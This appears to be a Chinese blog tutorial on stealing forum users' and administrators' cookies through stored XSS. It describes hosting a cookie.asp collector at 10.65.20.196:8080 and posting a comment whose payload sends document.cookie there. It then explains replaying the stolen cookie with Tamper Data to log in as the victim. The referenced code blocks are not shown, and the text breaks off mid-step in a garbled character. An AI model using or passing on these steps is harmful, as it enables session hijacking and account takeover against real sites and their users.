xss弹cookie利用XSS获取用户cookie
Cookie 获取 利用 用户 XSS
2023-09-11 14:19:27 时间
xss弹cookie利用XSS获取用户cookie,获取cookie利用代码cookie.asp
代码不多,直接打字也快。
把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。
XSS构造语句
把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg=’+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。
XSS构造语句简单步骤如下:
1、在存在漏洞的论坛中发日志:
2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:
3、这是没有账户前的登陆界面:
4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据ÿ
相关文章
- 理解Cookie和Session的区别及使用
- destoon系统开发-最新利用浏览器的cookie 做历史浏览记录
- Session,Cookie,jsessionid,Url重写
- JavaEE 要懂的小事:二、图解 Cookie(小甜饼)
- 第三百一十二节,Django框架,Cookie
- Cookie存储中文报错:java.lang.IllegalArgumentException: Control character in cookie value or attribute.(转)
- session & cookie
- Cookie&Session(转)
- python 获取cookie,发送请求
- curl模拟访问已经存在的cookie
- 登录处cookie验证逻辑漏洞——以熊海CMS为例
- cookie和session
- Cookie和Session的作用,区别和各自的应用范围,Session工作原理
- Python爬虫:browsercookie库获取浏览器cookie
- js-cookie读写浏览器中的Cookie及其应用
- Python爬虫之pyppeteer的使用(爬虫、获取cookie、截屏插件、防爬绕过)